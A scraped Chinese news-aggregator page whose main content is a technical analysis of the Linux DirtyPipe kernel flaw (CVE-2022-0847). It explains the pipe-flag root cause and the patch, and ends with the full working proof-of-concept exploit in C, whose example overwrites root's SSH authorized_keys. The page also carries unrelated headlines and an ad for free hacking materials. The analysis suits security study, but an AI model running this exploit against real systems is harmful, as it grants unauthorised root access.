最新要闻
- 热点聚焦:笔记本SSD普及率今年已达92%:机械硬盘凉凉了
- PC硬件机能榨干的日子一去不返!显卡危机不会再有了
- 【环球报资讯】机箱接口套路多 这些小知识你都知道吗?
- 【焦点热闻】设计时速250公里!银兰高铁全线开通运营:最快3小时可达
- 暴降千元性价比还是低!苹果欲放弃iPhone 14销售最差机型:你会买Plus吗
- 委员建议禁放烟花改为限时燃放 网友争议是否污染环境:多地明确禁放
- 头条焦点:AMD机会来了?商家预售NV RTX 4070 Ti:售价最高8399元
- 热推荐:卡梅隆急了!《阿凡达3》、《阿凡达4》已经开拍
- 焦点简讯:HTC Vive新品发布会定档1月6日:旗舰头显来了
- 全球视讯!TP-LINK Wi-Fi 7游戏路由器来了:三频19Gbps 双万兆网口
- 环球今亮点!又省117元 EPIC喜加一:硬核魂类游戏《致命躯壳 》免费送 手残党注意
- 冬至都过了 北半球日照越来越长:为什么却越来越冷了呢?
- 2022年抖音用户最爱的十本书:四大名著霸占前四名
- 全球最大规模“沙戈荒”风电光伏基地项目开工 投资超800亿元
- 今日关注:《王者荣耀》2023年第一款皮肤官宣:传说品质 首周135元
- 世界信息:2022年抖音十大热点歌曲出炉:你听过几首?
手机
iphone11大小尺寸是多少?苹果iPhone11和iPhone13的区别是什么?
警方通报辅警执法直播中被撞飞:犯罪嫌疑人已投案
- iphone11大小尺寸是多少?苹果iPhone11和iPhone13的区别是什么?
- 警方通报辅警执法直播中被撞飞:犯罪嫌疑人已投案
- 男子被关545天申国赔:获赔18万多 驳回精神抚慰金
- 3天内26名本土感染者,辽宁确诊人数已超安徽
- 广西柳州一男子因纠纷杀害三人后自首
- 洱海坠机4名机组人员被批准为烈士 数千干部群众悼念
家电
DirtyPipe(CVE-2022-0847)漏洞分析
前言
CVE-2022-0847 DirtyPipe
脏管道漏洞是Linux
内核中的一个漏洞,该漏洞允许写只读文件,从而导致提权。
调试环境
ubuntu 20.04
(资料图片)
Linux-5.16.10
qemu-system-x86_64 4.2.1
漏洞验证
首先创建一个只读文件foo.txt
,并且正常情况下是无法修改该可读文件,但是利用了DirtyPipe
漏洞后发现可以将字符aaaa
写入到只读文件中
漏洞分析
以poc
作为切入点,分析漏洞成因
首先poc
创建了一个管道,管道缓冲区的默认大小为4096,并且拥有16个缓存区,因此再创建管道之后,poc
首先要做的是将这16个管道缓冲区填满。
... if (pipe(p)) abort(); const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ); static char buffer[4096]; for (unsigned r = pipe_size; r > 0;) { unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r; write(p[1], buffer, n); r -= n; }...
在进行管道写的操作时,内核是采用pipe_write
函数进行操作,这里截取了关键部分,在进行管道写的时候会判断通过函数is_packetized
去判断是否为目录属性,如果不是则将缓冲区的标志位设置为PIPE_BUF_FLAG_CAN_MERGE
,这个标志位非常关键,是导致漏洞成因,因此poc
为了使16个管道缓冲区都设置PIPE_BUF_FLAG_CAN_MERGE
标志位,因此选择循环16次, 并且将每个管道缓冲区都写满。
随着poc
将管道内的数据全部读出,为了清空管道缓冲区,在进行管道读的过程中,内核采用的是pipe_read
函数,在整个管道读的过程中是不会修改管道的标志位的,因此PIPE_BUF_FLAG_CAN_MEGE
标志位依旧存在
...for (unsigned r = pipe_size; r > 0;) { unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r; read(p[0], buffer, n); r -= n; }...
紧接着是触发漏洞的关键函数,splice
函数,用于移动数据,此时fd
指向我们想读取的文件,对应上述的foo.txt
只读文件,p[1]指向的是我们的管道符。
...ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);...
【----帮助网安学习,以下所有学习资料免费领!加vx:yj009991,备注 “博客园” 获取!】
① 网安学习成长路径思维导图 ② 60+网安经典常用工具包 ③ 100+SRC漏洞分析报告 ④ 150+网安攻防实战技术电子书 ⑤ 最权威CISSP 认证考试指南+题库 ⑥ 超1800页CTF实战技巧手册 ⑦ 最新网安大厂面试题合集(含答案) ⑧ APP客户端安全检测指南(安卓+IOS)
在调用splice
函数时,内核在某个阶段会调用copy_page_to_iter
函数,可以看到当管道满了之后就没办法通过splice
函数往管道内继续输入数据,那么splice
函数就无法正常执行了,因此需要清空管道内的数据。
后面则到达了漏洞发生的代码,由于我们使用splice
函数进行数据的移动,在内核中不是选择将数据直接从文件中拷贝到管道中,而是将文件所在的物理页直接赋值给管道缓冲区所对应的页面。
这里记录一下物理页的地址
最后就是再次调用管道写的操作,但是这里实际会写入只读文件内部
...nbytes = write(p[1], data, data_size);...
由于已经通过splice
函数移动数据到管道缓冲区古内部了,因此管道不为空会进入到455
行的内部处理逻辑
最终到达了往只读文件写入的操作,这里看到了PIPE_BUF_FLAG_CAN_MERGE
这个标志位的作用,该标志位就是会将数据合并,使得后续管道写的操作会继续向之前的管道缓冲区对应的物理页面继续写入,写入的操作是通过copy_page_from_iter(buf->page,offset,chars,from)
函数进行完成的,该函数实际就是将from
对应的数据写入到buf->page
中
可以看到buf->page
与page
地址是完全一样的,这就导致我们将数据写入修改到foo.txt
文件中
补丁
补丁页比较简单,在获取物理页的同时把管道缓冲区的标志位清空,就不会导致后面对管道进行写操作的时候进入合并数据流的流程
总结
DirtyPipe
攻击流程
将所有管道缓冲区都设置
PIPE_BUF_FLAG_CAN_MERGE
标志位清空管道缓冲区
使用
splice
函数获取文件所对应的物理页使用
pipe_write
函数对拥有PIPE_BUF_FLAG_CAN_MERGE
标志位的处理,对获得文件对应的物理页进行写入操作,从而达到对只读文件写入的操作
DirtyPipe
利用的限制
对文件有读权限,因为
splice
函数会首先判断对文件是否有可读权限,若无则无法正常执行由于
DirtyPipe
是对文件对应的物理做覆写操作,因此不能修改超过文件本身大小的数据,以及文件的第一个字节无法被修改(因为splice
函数需要移动至少一字节数据)由于
DirtyPipe
是对物理页进行修改,因此修改数据大小也不能超过一页
完整的poc
/* SPDX-License-Identifier: GPL-2.0 *//* * Copyright 2022 CM4all GmbH / IONOS SE * * author: Max Kellermann* * Proof-of-concept exploit for the Dirty Pipe * vulnerability (CVE-2022-0847) caused by an uninitialized * "pipe_buffer.flags" variable. It demonstrates how to overwrite any * file contents in the page cache, even if the file is not permitted * to be written, immutable or on a read-only mount. * * This exploit requires Linux 5.8 or later; the code path was made * reachable by commit f6dd975583bd ("pipe: merge * anon_pipe_buf*_ops"). The commit did not introduce the bug, it was * there before, it just provided an easy way to exploit it. * * There are two major limitations of this exploit: the offset cannot * be on a page boundary (it needs to write one byte before the offset * to add a reference to this page to the pipe), and the write cannot * cross a page boundary. * * Example: ./write_anything /root/.ssh/authorized_keys 1 $"\nssh-ed25519 AAA......\n" * * Further explanation: https://dirtypipe.cm4all.com/ */#define _GNU_SOURCE#include #include #include #include #include #include #include #ifndef PAGE_SIZE#define PAGE_SIZE 4096#endif/** * Create a pipe where all "bufs" on the pipe_inode_info ring have the * PIPE_BUF_FLAG_CAN_MERGE flag set. */static void prepare_pipe(int p[2]){ if (pipe(p)) abort(); const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ); static char buffer[4096]; /* fill the pipe completely; each pipe_buffer will now have the PIPE_BUF_FLAG_CAN_MERGE flag */ for (unsigned r = pipe_size; r > 0;) { unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r; write(p[1], buffer, n); r -= n; } /* drain the pipe, freeing all pipe_buffer instances (but leaving the flags initialized) */ for (unsigned r = pipe_size; r > 0;) { unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r; read(p[0], buffer, n); r -= n; } /* the pipe is now empty, and if somebody adds a new pipe_buffer without initializing its "flags", the buffer will be mergeable */}int main(int argc, char **argv){ if (argc != 4) { fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]); return EXIT_FAILURE; } /* dumb command-line argument parser */ const char *const path = argv[1]; loff_t offset = strtoul(argv[2], NULL, 0); const char *const data = argv[3]; const size_t data_size = strlen(data); if (offset % PAGE_SIZE == 0) { fprintf(stderr, "Sorry, cannot start writing at a page boundary\n"); return EXIT_FAILURE; } const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1; const loff_t end_offset = offset + (loff_t)data_size; if (end_offset > next_page) { fprintf(stderr, "Sorry, cannot write across a page boundary\n"); return EXIT_FAILURE; } /* open the input file and validate the specified offset */ const int fd = open(path, O_RDONLY); // yes, read-only! :-) if (fd < 0) { perror("open failed"); return EXIT_FAILURE; } struct stat st; if (fstat(fd, &st)) { perror("stat failed"); return EXIT_FAILURE; } if (offset > st.st_size) { fprintf(stderr, "Offset is not inside the file\n"); return EXIT_FAILURE; } if (end_offset > st.st_size) { fprintf(stderr, "Sorry, cannot enlarge the file\n"); return EXIT_FAILURE; } /* create the pipe with all flags initialized with PIPE_BUF_FLAG_CAN_MERGE */ int p[2]; prepare_pipe(p); /* splice one byte from before the specified offset into the pipe; this will add a reference to the page cache, but since copy_page_to_iter_pipe() does not initialize the "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */ --offset; ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);if (nbytes < 0) {perror("splice failed");return EXIT_FAILURE; }if (nbytes == 0) {fprintf(stderr, "short splice\n");return EXIT_FAILURE; }/* the following write will not create a new pipe_buffer, but will instead write into the page cache, because of the PIPE_BUF_FLAG_CAN_MERGE flag */nbytes = write(p[1], data, data_size);if (nbytes < 0) {perror("write failed");return EXIT_FAILURE; }if ((size_t)nbytes < data_size) {fprintf(stderr, "short write\n");return EXIT_FAILURE; }printf("It worked!\n");return EXIT_SUCCESS;}
更多靶场实验练习、网安学习资料,请点击这里>>
DirtyPipe(CVE-2022-0847)漏洞分析
热点聚焦:笔记本SSD普及率今年已达92%:机械硬盘凉凉了
PC硬件机能榨干的日子一去不返!显卡危机不会再有了
【环球报资讯】机箱接口套路多 这些小知识你都知道吗?
【焦点热闻】设计时速250公里!银兰高铁全线开通运营:最快3小时可达
暴降千元性价比还是低!苹果欲放弃iPhone 14销售最差机型:你会买Plus吗
委员建议禁放烟花改为限时燃放 网友争议是否污染环境:多地明确禁放
头条焦点:AMD机会来了?商家预售NV RTX 4070 Ti:售价最高8399元
天天快讯:把WSL安装到指定目录下的简易完美方法
环球热点!Azure 使用技巧
热推荐:卡梅隆急了!《阿凡达3》、《阿凡达4》已经开拍
焦点简讯:HTC Vive新品发布会定档1月6日:旗舰头显来了
全球视讯!TP-LINK Wi-Fi 7游戏路由器来了:三频19Gbps 双万兆网口
环球今亮点!又省117元 EPIC喜加一:硬核魂类游戏《致命躯壳 》免费送 手残党注意
冬至都过了 北半球日照越来越长:为什么却越来越冷了呢?
AcWing245. 你能回答这些问题吗
2022年抖音用户最爱的十本书:四大名著霸占前四名
全球最大规模“沙戈荒”风电光伏基地项目开工 投资超800亿元
今日关注:《王者荣耀》2023年第一款皮肤官宣:传说品质 首周135元
关注:MAUI新生6.2-浮出控件导航Flyout-FlyoutItem/MenuItem/Header/Footer
世界信息:2022年抖音十大热点歌曲出炉:你听过几首?
男子网购N95口罩收到2瓶酱油 驿站:已拒收
观天下!谎称电脑中毒 印度团伙假冒微软工程师骗了美国人100多亿美元
顺丰:快递业的人海战术已近黄昏
环球快看点丨分享20个Javascript中的数组方法,收藏
基于 Dubbo Admin 实现同机房/区域优先
天天微资讯!Autodesk Maya2023 安装教程(小白看了也说understand)
焦点速递!分布式三大热门"IP"之分布式事务随笔
虚假新闻检测(CANMD)《Contrastive Domain Adaptation for Early Misinformation Detection:
世界要闻:全球出行需求爆棚:飞机制造巨头订单积压1.27万架 飞机远远不够用
焦点快播:三星推出43寸奥德赛Neo G7显示器:Mini-LED屏幕、支持144Hz高刷
最令人期待的2023新片
报道:2022年跨年档预售票房破1000万:《阿凡达2》仅位居第二
今年好莱坞最赔钱电影出炉:赔惨了
天天快播:Seata
【天天热闻】django 13 csrf 与 auth
IdentityServer4 - v4.x .Net中的实践应用
全球最新:第一百一十八篇: JavaScript 原型链式继承
【全球速看料】进口游戏版号时隔548天再发放!数量逐年下降
天天实时:2022年iPhone 14系列出货量下调 明年越南将加入生产
一加11打破安卓不可能!员工自己都不敢相信
全球要闻:兔年邮票“蓝兔子”引争议 真是童年阴影?邮政回应:没人投诉
一次多重体验:杰士邦三合一安全套30只19.9元发车
AcWing1169. 糖果
当前快讯:FreeSWITCH使用ODBC
【全球报资讯】基于NT架构脱胎换骨!QQ for Linux 3.0正式版上架官网
环球实时:卡梅隆自曝《阿凡达2》10分钟删减镜头:动作暴力元素相关
每日焦点!老外评选2022年10款最佳RPG游戏:老头环等上榜
无人驾驶可达80km/h:深圳坪山云巴1号线正式通车
【全球聚看点】还买啥Zen4 酷睿i7-12700KF到手2149元:12核5GHz游戏神U
.NET和JavaScript控件丨Infragistics功能简介
环球今热点:网友吃火锅被反向抹零多收0.3元 店家:四舍五入系统设定
【天天速看料】首发极具颠覆性技术 比亚迪仰望发布定档:明年1月5日见
全球短讯!根治安卓卡顿的旗舰来了!网友做梦梦到一加11:现在就想买 等不及了
世界微速讯:苹果高端制造离不开中国 iPhone 15 Pro Max新增立讯代工:富士康不再是唯一
天天快看点丨郑州200多车相撞事故已致1死 大雾是元凶:雾天行车指南要收好
天天报道:隐性等待和显性等待
python中的mysql操作教程及实例
大牌现货:超亚N95口罩84.9元30片发车
全球通讯!封杀半年之后微软“开恩” 俄罗斯网友可以下载Win11了
2022年进口网络游戏审批结果公布:腾讯《宝可梦大集结》等游戏在列
天天观察:世界最大液体镜面望远镜启用 成本仅为玻璃反射镜的1%
快播:NOIP动态规划
每日聚焦:数据结构(Data Structure)的基本思想是增删改查
环球视点!宝塔网站批量迁移
环球速看:首架C919机组人员分享飞行体验:感受很好、令人信任
加绒不加价:361°全革运动鞋99元大促(门店259元)
环球即时看!GTX 1060三朝元老还能被迫营业?
二代骁龙8折叠旗舰!vivo X Fold 2来了:2K轻薄大屏
实时焦点:不下载不让看全文成为历史!工信部新规将禁止网页强制用户下载应用
开发工具与低代码开发平台丨上海道宁联合Grapecity为您提供各类软件开发工具和服务
当云原生网关遇上图数据库,NebulaGraph 的 APISIX 最佳实践
天天看点:LOJ 6041 「雅礼集训 2017 Day7」事情的相似度 题解 (SAM+启发式合并)
当前热讯:WinNTSetup V5.3.0 Bata5 单文件版
一分钟搞定Netty 三大组件,如果搞不定,再看3遍
世界播报:《阿凡达2》差的远!2022国内电影票房前10:第一超40亿
前沿热点:折叠旗舰卖到白菜价!moto razr 2022宣布调价至4999元
美国人钱包年末又迎重击!极端寒潮导致上周电价飙升超6000%
天天时讯:或售70万对刚比亚迪!东风猛士M-Terrain量产实车曝光:凶悍
只有Redmi做到了!米粉没想到2022年2500元的手机都有无线充电
环球热文:隐私计算之多方安全计算(MPC,Secure Multi-Party Computation)
河南郑新黄河大桥因大雾多车相撞:涉及200多辆车
速递!安卓手机不卡顿!一加11内存基因重组技术揭秘:数据抓取量提升16倍
特斯拉股价年内暴跌70% 韩国散户疯狂抄底!背后原因不简单
女生病假期上9天班反欠公司三百多:被扣10天工资
环球速看:曝特斯拉上海工厂将在1月实施减产计划 原因未知
直降120:百度网盘超级会员12个月SVIP 178元大促
今日关注:交叉编译esp8089
【环球新要闻】Python中itertools详解
playgo是什么意思?playgo是什么牌子?
十年之痒是什么意思?十年之痒的婚姻感悟小说有哪些?
【天天聚看点】女子投资100万元 本金4年仅剩1.71万元!基金经理被集体起诉
神价手慢无:OATLY噢麦力燕麦奶1L*2瓶/19.9元抄底
焦点速读:轿车加气站去加气 一开后备厢车被炸报废
诚意碾压苹果官网!京东开启年终优惠:iPhone 14直降900元
用户已破6亿!钉钉7.0版本发布:解决产业链协同问题
室内地坪是什么意思?室内地坪漆用什么颜色?
苏武留胡节不辱是什么意思?苏武的精神品质是什么?
调配奶粉是什么意思?调制奶粉的营养价值有哪些?
亚热带水果有哪些?亚热带水果的生长环境有哪些?